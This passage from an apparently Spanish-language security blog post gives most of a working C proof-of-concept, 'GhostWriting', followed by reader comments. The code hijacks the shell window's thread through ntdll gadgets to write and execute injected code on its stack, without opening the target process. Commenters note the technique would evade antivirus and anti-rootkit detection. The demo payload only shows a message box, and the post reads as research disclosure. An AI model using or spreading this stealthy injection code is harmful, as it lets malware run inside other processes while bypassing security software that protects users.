        // |        |           |                                           |  ( POP REGx / ADD REGx,yy )            |
        // |        |           |                                           |  .                                     |
        // |        |           |                                           |  .                                     |
        // |        |           |                                           |  RET / RET n                           |
        // |        |           |                                           |________________________________________|
        // |        |           |
        // |        |           |
        // |        |           |                                                     SOMEWHERE INTO NTDLL.DLL's CODE
        // |        |           |                                                     _______________________________
        // |        `--------------------------------------------------------------->|                               |
        // |                    |                                                    |  JMP $                        |
        // |                    |                                                    |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //

        DWORDWritingPointer=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD);

        for(i=0;i<9;i++)
        {
            WorkingThreadContext.Esp=BASEOfWrittenBytes;
            *WritePointer=DWORDWritingPointer-MOVRETOffsetFromMemoryRegister;
            *WriteItem=NtProtectVirtualMemoryCallFrame[i];
            WorkingThreadContext.Eip=MOVRETAddress;

            WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);

            DWORDWritingPointer+=sizeof(DWORD);
        }

        // After this for executes, we have the NtProtectVirtualMemory call frame written to the hijacked thread's stack:
        //
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- BASEOfWrittenBytes
        // | dummy a            |
        // | dummy b            |
        // | .                  |
        // | .                  |
        // | dummy z            |
        // |____________________|
        // | JMPTOSELFAddress -------------------.
        // |____________________|                |
        // | SIMULATED RETADDR  |<--- ESP        |
        // | p.1: ProcessHandle |                 |
        // | p.2: &BaseAddress -----------.         |
        // | p.3: &NumBytesProt --------. |         |
        // | p.4: NewAccessProt |       | |         |
        // | p.5: &OldAccessPrt ----.   | |         |
        // | BaseAddress --.    |<--+---+-Ž         |
        // | NumBytesProt  |    |<--+---Ž         |
        // | OldAccessPrt  |    |<--Ž             |
        // |-------------- v ---|                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |                                    SOMEWHERE INTO NTDLL.DLL's CODE
        // |                    |                |                                    _______________________________
        // |                    |                |      EIP == JMPTOSELFAddress --->\|                               |
        // |                    |                `--------------------------------->/|  JMP $                        |
        // |                    |                                                    |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //
        // NOTE: One could say that that return address ( JMPTOSELFAddress ) is put twice and that we could have optimized this by not writing it again,
        //       it's true. However, I preferred to isolate this call frame from the previous stack stuff in order to make it more clear and also more
        //       generic.

        // Ok, so we have set up that call frame for later usage, we could run that call to NtProtectVirtualMemory now, but, for the sake of clearness,
        // let's make the writings first and let the executions for the ending part. So let's write our last bytes, the injection executable bytes. See
        // how DWORDWritingPointer points just ahead of the previously written call frame, so we do not need to calculate it again, it actually points
        // where it needs to.

        // We save curent DWORDWritingPointer's value in order to set thread's EIP to that value later on ( in injection execution fase ).
        InjectedCodeExecutionStart=DWORDWritingPointer;

        // Here we write executable code bytes, DWORD by DWORD, into thread's stack space
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- ,ESP == BASEOfWrittenBytes
        // | dummy a            |   ,-| +
        // | dummy b            |   | `NumberOfBytesToPopAfterMOVBeforeRET
        // | .                  |   |
        // | .                  |   |
        // | dummy z            |   |                                                         ( for i from 0 to NumberOfDWORDsToInject )---.
        // |____________________|   |                                                                                                      |
        // | JMPTORETAddress    |<--Ž                                                            *WriteItem ( REG2 ) == InjectionCode[i] <-|
        // || __________________|                 ,MOVRETOffsetFromMemoryRegister                                                          |
        // ||SIMULATED RETADDR  |               ,-| -                                                                                      |
        // ||p.1: ProcessHandle |               | `*WritePointer ( REG1 ) == DWORDWritingPointer+i*4 <-------------------------------------Ž
        // ||p.2: &BaseAddress -----------.     |                            SOMEWHERE INTO NTDLL.DLL's CODE
        // ||p.3: &NumBytesProt --------. |        |                            ________________________________________
        // ||p.4: NewAccessProt |       | |        |  EIP == MOVRETAddress --->|                                        |
        // ||p.5: &OldAccessPrt ----.   | |     |                           |  MOV [REG1],REG2 / MOV [REG1+xx],REG2  |
        // ||BaseAddress --.    |<--+---+-Ž        |                           |  ( POP REGx / ADD REGx,yy )            |
        // ||NumBytesProt  |    |<--+---Ž       |                           |  .                                     |
        // ||OldAccessPrt  |    |<--Ž           |                           |  .                                     |
        // || ------------ v ---|               |                           |  RET / RET n                           |
        // ||                   |<--------------Ž                           |________________________________________|
        // ||                   | .
        // ||                   | .
        // ||                   | .                                                   SOMEWHERE INTO NTDLL.DLL's CODE
        // ||                   |                                                     _______________________________
        // |`----------------------------------------------------------------------->|                               |
        // |                    |                                                    |  JMP $                        |
        // |                    |                                                    |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //

        for(i=0;i<NumberOfDWORDsToInject;i++)
        {
            WorkingThreadContext.Esp=BASEOfWrittenBytes;
            *WritePointer=DWORDWritingPointer-MOVRETOffsetFromMemoryRegister;
            *WriteItem=InjectionCode[i];
            WorkingThreadContext.Eip=MOVRETAddress;

            WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);

            DWORDWritingPointer+=sizeof(DWORD);
        }

        // So, after this code injection writing loop, we have achieved this:
        //
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- BASEOfWrittenBytes
        // | dummy a            |
        // | dummy b            |
        // | .                  |
        // | .                  |
        // | dummy z            |
        // |____________________|
        // | JMPTOSELFAddress -------------------.
        // |____________________|                |
        // | SIMULATED RETADDR  |<--- ESP        |
        // | p.1: ProcessHandle |                 |
        // | p.2: &BaseAddress -----------.         |
        // | p.3: &NumBytesProt --------. |         |
        // | p.4: NewAccessProt |       | |         |
        // | p.5: &OldAccessPrt ----.   | |         |
        // | BaseAddress --.    |<--+---+-Ž         |
        // | NumBytesProt  |    |<--+---Ž         |
        // | OldAccessPrt  |    |<--Ž             |
        // |-------------- v ---|                |
        // | EXECUTABLE CODE    |                |
        // | EXECUTABLE CODE    |                |
        // | EXECUTABLE CODE    |                |
        // | EXECUTABLE CODE    |                |                                    SOMEWHERE INTO NTDLL.DLL's CODE
        // | EXECUTABLE CODE    |                |                                    _______________________________
        // | EXECUTABLE CODE    |                |      EIP == JMPTOSELFAddress --->\|                               |
        // | EXECUTABLE CODE    |                `--------------------------------->/|  JMP $                        |
        // | EXECUTABLE CODE    |                                                    |_______________________________|
        // | EXECUTABLE CODE    |
        // | EXECUTABLE CODE    |
        // | EXECUTABLE CODE    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //

        // Ok, all the needed stuff has been written to the hijacked stack. As we said before, first we write, then we execute. All written, let's run !

        // We will first run the NtProtectVirtualMemory with our written, simulated call frame:
        WorkingThreadContext.Esp=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD);    // We make thread's ESP point into the callframe
        WorkingThreadContext.Eip=NtProtectVirtualMemoryAddress;    // and set thread's EIP point to the address of that API into NTDLL.DLLs code. This two
                                                                // changes simulate the call. I hope you will understand it yourself this time ;)

        WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);

        // And finally, the moemnt we have all been waiting for.
        WorkingThreadContext.Esp=BASEOfWrittenBytes;    // set ESP to a "safe" place
        WorkingThreadContext.Esi=JMPTOSELFAddress;    // injected code expects ESI to be its "EXIT ADDRESS" ( see InjectionCode array declaration )
        WorkingThreadContext.Ebx=BASEOfWrittenBytes;    // injected code also expects EBX to be its "Delta Handle" or memory base address of its own
        WorkingThreadContext.Eip=InjectedCodeExecutionStart;    // set EIP to the base address where the injected executable code starts ;)

        WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);    // and... RUN !!!

        // alllllll donnneee ! let's let hijacked thread loose so it enjoys is silly life again ¬¬...
        SetThreadContext(Thread,&SavedThreadContext);    // restore initial thread's original state and restore it...
        ResumeThread(Thread);    // and resume its execution

        PostMessage(ThreadsWindow,WM_USER,0,0);    // Just in case, send a message to awake its wait...

        return TRUE;    // all went fine :D

    }
    else    // else, we did not found those two patterns :(
        return FALSE;    // so we return with error...
}

void main(void)
{
    HWND ShellWindowHandle;
    DWORD ShellWindowThread;
    HANDLE VictimThreadHandle;

    // We solve MessageBoxA APIs address...
    HMODULE USER32Base=LoadLibrary("USER32.DLL");
    DWORD MessageBoxAAddress=(DWORD)GetProcAddress(USER32Base,"MessageBoxA");
    FreeLibrary(USER32Base);

    *(DWORD*)(&InjectionCode[58])=MessageBoxAAddress;    // And we put that address into InjectionCode ( see InjectionCode array declaration )

    // We get our victim thread
    ShellWindowHandle=GetShellWindow();    // by first getting a handle of a window it owns
    ShellWindowThread=GetWindowThreadProcessId(ShellWindowHandle,NULL);    // and then getting the owning thread ID of that window

    VictimThreadHandle=OpenThread(THREAD_SET_CONTEXT|THREAD_GET_CONTEXT|THREAD_SUSPEND_RESUME,FALSE,ShellWindowThread);    // We open victim thread

    // And we try our injection technique over it :D
    if (Inject(VictimThreadHandle,InjectionCode,(sizeof(InjectionCode)+4)/4,ShellWindowHandle))
        MessageBox(NULL,"SUCCESS ! ;D","GhostWriting: Proof Of Concept",0);    // Yay !
    else
        MessageBox(NULL,"FAILURE ! :(","GhostWriting: Proof Of Concept",0);    // Ouch :S

    CloseHandle(VictimThreadHandle);
}

15 pensamientos en “A paradox: Writing to another process without openning it nor actually writing to it

  1. c0de90e7

    Thanks for posting it man ;D

    Nos veremos por el casco ;D para cantar aquella de… "Java-java desktop, javaadesktop fueee un errorrr! wohoo! java fue un error !…" xDDD

    P.S.: uhmmm, what a post number… 😀 zen is everywhere… pleasure is too !

    Responder
  2. tomac

    " remote code without actually opening the target process"

    Pero, por lo que he visto de un vistazo, e igual me equivoco, esa afirmación no es del todo cierta no? Ya que secuestramos un hilo del proceso para infectarle el stack. Buen trabajo!

    Responder
  3. c0de90e7

    Efectivamente, se trata de secuestrar el hilo y, solo con GetThreadContext/SetThreadContext, conseguir escribir al proceso. Es una forma mas de escribir al proceso, pero eso, no se llega a hacer OpenProcess ni WriteProcessMemory. Si lees la parte "The Concept" lo dice, no es una paradoja, pero es verdad que no requerimos el proceso para nada 😉

    Responder
  4. TensionHead

    c0de90e7 y compañía, en serio…¿podeis explicar que quereis decir con lo de..?

    "Java-java desktop, javaadesktop fueee un errorrr! wohoo! java fue un error !…" xDDD

    ¿No os gusta Java?.

    Gracias, saludos.

    Responder
  5. c0de90e7

    Hola TensionHead,

    Nah, eso, si lo cantas con el tonillo y musiquilla en plan "Nada-nada de esto, nada de esto fue un error…", ya sabes, la cancion esa de medio-moda :), pues eso, es unas risas por que queda muy parecido y es muy friki. Y eso, la anecdota fue encontrarnos por ahi de juerga y empezar a cantarlo y tal 😀

    Los similes foneticos son:
    nada > java
    nada de esto > java desktop

    Y eso, de ahi salieron toda clase de frikezas xD…

    Y bueno, ami java no me gusta, ni me gusta .net ni otras cosas del estilo, pero es por razones romaticas en parte, asi que no me hagas demasiado caso 😉

    Java, .net, etc. para mi tienen su utilidad, sin mas.

    Responder
  6. txipi

    A parte que Java Desktop fue una distro de GNU/Linux que sacó Sun para intentar conseguir meterse en el mercado linuxero y no fue nada exitosa, así que "Java Desktop fue un error" 😀

    Responder
  7. TensionHead

    0_o ¿Y no se os quedan mirando cuando cantais esas cosas tan "raras"? :^)

    Por cierto c0de90e7, con lo de razones romaticas supongo que quieres decir románticas, y seguro que como txipi serás un enamorado de C, ¿o de Python quizás?. Por allí por Deusto "parece" que se estila mucho.

    Saludos

    Responder
  8. c0de90e7

    Hehe, mirando… bueno, aveces si xD.

    Si, me referia a eso: razones románticas :D. Enamorado… mas bien del ensamblador o codigo maquina hehe. De hecho, la primera version de esta PoC la hice en ensamblador ( si alguien la quiere… pero esta guarrilla guarrilla… era cuando estaba haciendo el research en si… ), y luego la pase a C para que se entendiera mas facil y tal.

    No se cual sera la preferencia de txipi, creo que C si que le gusta, y luego es un mastah del Shell Scripting ( que puede ser un compendio de varios lenguajes, ademas de ello mismo ), incluyendo algun que otro lenguaje interpretado, no se si le gusta python :D, aunque en deusto si que recuerdo que habia un enamorado de python ( muy enamorado 😀 )…

    Es mi asignatura pendiente, aprender o bien perl, o bien python o bien ruby.

    Hace un tiempo tuvimos que traducir un fichero de un mega de texto ( includes para ensamblador en win32 que estaban hechas para MASM, y las portamos a NASM ) y gracias a un par de scripts en perl el trabajo se redujo al 5%, que aun asi fue tedioso, pero realizable. Desde entonces me pica bastante aprender perl… pero no hay tiempo para todo…

    Responder
  9. TensionHead

    Pues entre elegir Perl o Python la respuesta la tendría clara; el segundo.
    A mi la sintaxis de Perl no me gusta nada, y Python me parece una fiera. Ruby no lo conozco nada.

    Supongo que esto es como todo. Gustos, y sobre gustos…

    Responder
  10. abruzzi

    Hola, he probado el código y no me ha funcionado, se deben tomar en cuenta requisitos especiales (versión ansi o unicode de windows, tamaño mínimo de memoria, no tener segun que procesos corriendo, etc)?. Aparte, creo que no has descubierto nada nuevo.., ya hay documentación en ingles sobre la modificación de código en threads remotos mediante únicamente GetThreadContext & SetThreadContext, yo lo he leido en algún que otro paper sobre ingeniería inversa, y en alguno otro sobre rk’s para windows.

    Responder
  11. c0de90e7

    En principio deberia funcionar en todos o la mayoria de NTs eh ? yo lo he probado en varios 2000es diferentes ( SP0,SP4 ), varios XPs diferentes, varios 2003 diferentes, 2 betas de Vista y la release final de Vista tambien, y todas han funcionado… no deberia influir el tema de localizaciones… En cuanto a que ya hay doc de esto… puedes rularme referencias. Precisamente, cuando consegui hacerlo, lo primero que hice fue mirar en rootkit.com y en esos temas en general a ver si veia algo, y nada, solo encontre un hilo en rootkit.com de un tio que planteaba algo similar ( aunque se trataba de inyectar una .DLL ) y no lo habia conseguido, he preguntado a gente del mundillo y me dicen que exactamente de eso no tienen constancia…

    Ya digo, puede que haya habiado algo, no lo niego, aunque no he visto nada… de todas formas, espero que no te refieras al tipico caso de abrir el proceso normal y usar writeprocessmemory etc. y _solo para evitar el uso de createremotethread_ utilizar setthreadcontext…

    La referencia de lo unico que yo haya encontrado de esto, que ya te digo, no se conseguia, es:

    http://www.rootkit.com/newsread….

    mira el reply de "dsei":

    http://www.rootkit.com/board.php...

    este es el unico que tenia una idea algo mas ambiciosa, pues todo esto era para evitar controles de ejecucion en antirootkits, firewalls, avs… y por mucho que evites createremotethread ( eso no es nuevo ), todo el mundo abria el proceso y hacia writeprocessmemory…

    No se, por favor, pasame referencias, por que si en verdad alguien ya lo ha hecho, pues oye, sin mas, estaba en el desconocimiento…

    Gracias y un saludo,

    P.S.: De todas formas, puedes indicarme que error te da o algo asi… he probado muchos windows diferentes ( corriendo en maquinas IA32 ) y me ha ido bien :S

    Responder
  12. Mario

    Está interesante la técnica :-)), seguramente cuele en la mayoría de software con detecciones "proactivas", por cierto el nick también muy bueno xD

    Un saludo!,

    Mario

    Responder
  13. c0de90e7

    Gracias Mario 🙂 Si, el nick esta chulo, algo flipadillo, pero mola xD y lo mejor es que entra en un DWORD en hexadecimal :D. Lo he usado en algun que otro exploit donde necesitaba un patron ( la del expand-down data segment de w2k… ) y bueno, ahora lo uso como nick 😛

    Responder
  14. ack

    Vaya, veo que ya lo has publicado… Buen trabajo! Yo diría que ésta técnica se le debe colar a todo o casi todo el software anti virus/rootkit/etc…

    Y ese nick, eeeejeeeemmmm 😉

    Responder

Responder a Mario Cancelar respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *